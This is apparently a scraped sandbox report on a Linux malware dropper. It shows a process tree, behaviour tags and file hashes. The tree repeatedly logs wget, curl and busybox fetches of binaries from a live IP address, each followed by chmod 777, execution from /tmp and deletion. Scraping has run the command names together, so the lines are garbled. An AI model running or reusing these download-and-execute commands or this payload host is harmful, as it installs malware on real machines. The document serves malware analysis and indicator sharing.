PID:936
-
-
/bin/rmrm s02w1o0pxnYYKJWIwy3YL5yMkiuq3qyDMU2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:940
-
-
/bin/chmodchmod 777 r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo./r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm r1yO4lAbDtUw6SsTyBJ5dnBUda3GSY2HBo2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:946
-
-
/bin/chmodchmod 777 c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD./c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm c9uXiBz6Dqg1m8aVFB7dkX3LwklsocXzzD2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:952
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:958
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:964
-
-
/bin/chmodchmod 777 FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ./FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:970
-
-
/bin/chmodchmod 777 J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH./J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm J5ae25TX7zIwwVH3IgEvX3BEMMPfsjINbH2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:976
-
-
/bin/chmodchmod 777 xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R./xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm xu9bFgmp5KgGLmZBEsnOJuxWHQvTXBem2R2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97